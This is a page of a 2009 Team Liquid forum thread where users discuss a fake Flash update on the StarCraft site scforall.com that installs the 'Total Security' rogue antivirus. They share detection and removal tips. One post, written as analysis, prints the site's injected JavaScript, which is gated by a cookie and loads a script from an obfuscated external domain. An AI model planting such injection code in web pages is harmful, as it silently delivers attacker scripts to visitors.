• Log InLog In
  • Register
Liquid`
Team Liquid Liquipedia
EDT 03:57
CEST 09:57
KST 16:57
  • Home
  • Forum
  • Calendar
  • Streams
  • Liquipedia
  • Features
  • Store
  • EPT
  • TL+
  • StarCraft 2
  • Brood War
  • Smash
  • Heroes
  • Counter-Strike
  • Overwatch
  • Liquibet
  • Fantasy StarCraft
  • TLPD
  • StarCraft 2
  • Brood War
  • Blogs
Forum Sidebar
Events/Features
News
Featured News
Team TLMC #5 - Finalists & Open Tournaments0[ASL20] Ro16 Preview Pt2: Turbulence10Classic Games #3: Rogue vs Serral at BlizzCon9[ASL20] Ro16 Preview Pt1: Ascent10Maestros of the Game: Week 1/Play-in Preview12
Community News
BSL 2025 Warsaw LAN + Legends Showmatch0Weekly Cups (Sept 8-14): herO & MaxPax split cups4WardiTV TL Team Map Contest #5 Tournaments1SC4ALL $6,000 Open LAN in Philadelphia8Weekly Cups (Sept 1-7): MaxPax rebounds & Clem saga continues29
StarCraft 2
General
#1: Maru - Greatest Players of All Time Weekly Cups (Sept 8-14): herO & MaxPax split cups Team Liquid Map Contest #21 - Presented by Monster Energy SpeCial on The Tasteless Podcast Team TLMC #5 - Finalists & Open Tournaments
Tourneys
Maestros of The Game—$20k event w/ live finals in Paris Sparkling Tuna Cup - Weekly Open Tournament SC4ALL $6,000 Open LAN in Philadelphia WardiTV TL Team Map Contest #5 Tournaments RSL: Revival, a new crowdfunded tournament series
Strategy
Custom Maps
External Content
Mutation # 491 Night Drive Mutation # 490 Masters of Midnight Mutation # 489 Bannable Offense Mutation # 488 What Goes Around
Brood War
General
Soulkey on ASL S20 NaDa's Body BW General Discussion A cwal.gg Extension - Easily keep track of anyone BGH Auto Balance -> http://bghmmr.eu/
Tourneys
[ASL20] Ro16 Group D [ASL20] Ro16 Group C [Megathread] Daily Proleagues BSL 2025 Warsaw LAN + Legends Showmatch
Strategy
Simple Questions, Simple Answers Muta micro map competition Fighting Spirit mining rates [G] Mineral Boosting
Other Games
General Games
Stormgate/Frost Giant Megathread Nintendo Switch Thread Path of Exile Borderlands 3 General RTS Discussion Thread
Dota 2
Official 'what is Dota anymore' discussion LiquidDota to reintegrate into TL.net
League of Legends
Heroes of the Storm
Simple Questions, Simple Answers Heroes of the Storm 2.0
Hearthstone
Heroes of StarCraft mini-set
TL Mafia
TL Mafia Community Thread
Community
General
US Politics Mega-thread Canadian Politics Mega-thread Things Aren’t Peaceful in Palestine Russo-Ukrainian War Thread UK Politics Mega-thread
Fan Clubs
The Happy Fan Club!
Media & Entertainment
Movie Discussion! [Manga] One Piece Anime Discussion Thread
Sports
2024 - 2026 Football Thread Formula 1 Discussion MLB/Baseball 2023
World Cup 2022
Tech Support
Linksys AE2500 USB WIFI keeps disconnecting Computer Build, Upgrade & Buying Resource Thread High temperatures on bridge(s)
TL Community
BarCraft in Tokyo Japan for ASL Season5 Final The Automated Ban List
Blogs
I <=> 9
KrillinFromwales
The Personality of a Spender…
TrAiDoS
A very expensive lesson on ma…
Garnet
hello world
radishsoup
Lemme tell you a thing o…
JoinTheRain
RTS Design in Hypercoven
a11
Evil Gacha Games and the…
ffswowsucks
Customize Sidebar...

Website Feedback

Closed Threads



Active: 1866 users

ScForAll unsafe... - Page 3

Forum Index > BW General
Post a Reply
Prev 1 2 3 4 5 Next All
ghermination
Profile Blog Joined April 2008
United States2851 Posts
Last Edited: 2009-09-26 22:17:38
September 26 2009 22:12 GMT
#41
I visited earlier, ignored the attack site warnings. I didn't download anything because i'm not retarded but that didn't seem to spontanteously get me a virus so it seems one could still surf the site as long as they don't download anything.

http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644

While reading the "there is nothing wrong with the site" news post, i noticed this:

+ Show Spoiler +

Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong.


apparently there are quite a few gaping security holes in scforall.com
U Gotta Skate.
Amarxist
Profile Blog Joined July 2008
United States371 Posts
September 26 2009 22:51 GMT
#42
I'm glad I run flash-block and no-script. I only allow javascript to run based on a whitelist. Anything new that comes up just doesn't run at all.
☺ ☻
piratebay
Profile Blog Joined April 2009
United States399 Posts
September 26 2009 22:55 GMT
#43
this just proves that TL is a better sight than scforall~~ haha

on a more serious note, i shall d/l the file to spite my university~
Rebuke[SkyNet]
Profile Joined September 2009
18 Posts
September 26 2009 23:01 GMT
#44
this site is def. not secure to visit yet, just letting you guys know. this has come to my attention about 3 months ago and ever since then i never touched the website, artosis/whoever need to take action asap. my computer won't even let me go to the site because its so dangerous
Cocaine isn't a habit, its a lifestyle.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 26 2009 23:47 GMT
#45
Glad I'm not the only one who had this problem. If you get the Total Security 2009 bullshit I got, you can just rename taskmgr.exe in system32 to iexplore.exe(the only program you can open) and end the task and then remove the virus.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
OmniKnight
Profile Joined August 2008
United States73 Posts
September 27 2009 00:05 GMT
#46
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
sashkata
Profile Joined September 2008
Bulgaria3241 Posts
September 27 2009 00:10 GMT
#47
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
Foucault
Profile Blog Joined May 2009
Sweden2826 Posts
September 27 2009 00:14 GMT
#48
Yeah I don't really trust scforall right now either. I had some weird virus thing pop up on that site, like it was hi-jacked or something
I know that deep inside of you there's a humongous set of testicles just waiting to pop out. Let 'em pop bro. //////////////////// AKA JensOfSweden // Lee Yoon Yeol forever.
KizZBG
Profile Blog Joined November 2006
u gotta skate8152 Posts
September 27 2009 00:20 GMT
#49
Similar thing happened to me the other day where I was asked to download some .pdf or something which I just ignored. Thankfully it didn't to anything to my system lol.

On September 27 2009 04:47 SonuvBob wrote:
Show nested quote +
On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.

Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.

PuertoRican?
eSTRO for life | #2 Sea.Really fan! | #1 GosI[Flying] fan! | Clide - best SC2 terran!
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 01:27 GMT
#50
Website is 100% infected. Confirmed using Virtual Machine.

The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled.

Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe

After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security

Code:
+ Show Spoiler +

<script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script>


Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools.


----

Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone.
When you do something right, people wont notice youve done anything at all.
Manifesto7
Profile Blog Joined November 2002
Osaka27151 Posts
September 27 2009 01:43 GMT
#51
I blame this on the LastShadow interview.
ModeratorGodfather
Nytefish
Profile Blog Joined December 2007
United Kingdom4282 Posts
Last Edited: 2009-09-27 01:49:07
September 27 2009 01:48 GMT
#52
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


I avoided it because I was too lazy to get an update.
It's not that stupid to fall for something that looks like a flash player update.
No I'm never serious.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 27 2009 02:12 GMT
#53
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


Next time I'll use repel.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
Tsagacity
Profile Blog Joined August 2005
United States2124 Posts
September 27 2009 02:13 GMT
#54
Wow. Now when I visit this site firefox gives me a preload page warning me that it's an attack site :O
"Everyone worse than me at video games is a noob. Everyone better than me doesn't have a life."
Catch]22
Profile Blog Joined July 2009
Sweden2683 Posts
Last Edited: 2009-09-27 02:15:11
September 27 2009 02:13 GMT
#55
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 02:26 GMT
#56
so how do I check if I got infected, and how do i treat it?


Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist.

Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it.
When you do something right, people wont notice youve done anything at all.
SpiritWolf
Profile Joined July 2008
United States127 Posts
Last Edited: 2009-09-27 02:27:13
September 27 2009 02:26 GMT
#57
On September 27 2009 11:13 Catch]22 wrote:
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site


I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine.
Initial_H.C.
Profile Blog Joined September 2008
Canada560 Posts
September 27 2009 03:10 GMT
#58
On September 27 2009 09:10 sashkata wrote:
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.


Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it.
JohnColtrane
Profile Blog Joined July 2008
Australia4813 Posts
September 27 2009 03:14 GMT
#59
Do we know when this virii shit started happening on SCforall? because ive been on their site a little while ago and never got any fake adobe updates (or real adobe updates for that matter.)

i'm pretty sure it was within september
HEY MEYT
R1CH
Profile Blog Joined May 2007
Netherlands10341 Posts
Last Edited: 2009-09-27 03:25:49
September 27 2009 03:21 GMT
#60
It's always been happening, check the site history. That's what happens when you depend on too many remote includes (or have exploits in your site).

Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009
Google reported badware activity on scforall.com/forums/ on Mar 5th 2009
Google reported badware activity on scforall.com/news/ on Mar 5th 2009
Google reported badware activity on scforall.com/prog/ on Mar 5th 2009
Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009
Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009
Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008
AdministratorTwitter: @R1CH_TL
Prev 1 2 3 4 5 Next All
Please log in or register to reply.
Live Events Refresh
Next event in 2h 3m
[ Submit Event ]
Live Streams
Refresh
StarCraft 2
ProTech77
StarCraft: Brood War
GuemChi 2076
JulyZerg 58
Dewaltoss 55
ToSsGirL 45
Nal_rA 42
HiyA 39
ajuk12(nOOB) 21
Sharp 15
SilentControl 5
Dota 2
NeuroSwarm127
XcaliburYe98
boxi9893
League of Legends
JimRising 521
Counter-Strike
Stewie2K566
shoxiejesuss396
Other Games
summit1g9295
C9.Mang0317
XaKoH 149
Trikslyr21
Organizations
Other Games
gamesdonequick623
StarCraft: Brood War
UltimateBattle 51
StarCraft 2
Blizzard YouTube
StarCraft: Brood War
BSLTrovo
sctven
[ Show 16 non-featured ]
StarCraft 2
• LUISG 17
• Light_VIP 15
• AfreecaTV YouTube
• intothetv
• Kozan
• IndyKCrew
• LaughNgamezSOOP
• Migwel
• sooper7s
StarCraft: Brood War
• iopq 2
• BSLYoutube
• STPLYoutube
• ZZZeroYoutube
League of Legends
• Lourlo872
• Stunt443
• Jankos273
Upcoming Events
RSL Revival
2h 3m
Maru vs Reynor
Cure vs TriGGeR
Map Test Tournament
3h 3m
The PondCast
5h 3m
RSL Revival
1d 2h
Zoun vs Classic
Korean StarCraft League
1d 19h
BSL Open LAN 2025 - War…
2 days
RSL Revival
2 days
BSL Open LAN 2025 - War…
3 days
RSL Revival
3 days
Online Event
3 days
[ Show More ]
Wardi Open
4 days
Monday Night Weeklies
4 days
Sparkling Tuna Cup
5 days
LiuLi Cup
6 days
Liquipedia Results

Completed

Proleague 2025-09-10
Chzzk MurlocKing SC1 vs SC2 Cup #2
HCC Europe

Ongoing

BSL 20 Team Wars
KCM Race Survival 2025 Season 3
BSL 21 Points
ASL Season 20
CSL 2025 AUTUMN (S18)
LASL Season 20
RSL Revival: Season 2
Maestros of the Game
StarSeries Fall 2025
FISSURE Playground #2
BLAST Open Fall 2025
BLAST Open Fall Qual
Esports World Cup 2025
BLAST Bounty Fall 2025
BLAST Bounty Fall Qual
IEM Cologne 2025
FISSURE Playground #1

Upcoming

2025 Chongqing Offline CUP
BSL World Championship of Poland 2025
IPSL Winter 2025-26
BSL Season 21
SC4ALL: Brood War
BSL 21 Team A
Stellar Fest
SC4ALL: StarCraft II
EC S1
ESL Impact League Season 8
SL Budapest Major 2025
BLAST Rivals Fall 2025
IEM Chengdu 2025
PGL Masters Bucharest 2025
MESA Nomadic Masters Fall
Thunderpick World Champ.
CS Asia Championships 2025
ESL Pro League S22
TLPD

1. ByuN
2. TY
3. Dark
4. Solar
5. Stats
6. Nerchio
7. sOs
8. soO
9. INnoVation
10. Elazer
1. Rain
2. Flash
3. EffOrt
4. Last
5. Bisu
6. Soulkey
7. Mini
8. Sharp
Sidebar Settings...

Advertising | Privacy Policy | Terms Of Use | Contact Us

Original banner artwork: Jim Warren
The contents of this webpage are copyright © 2025 TLnet. All Rights Reserved.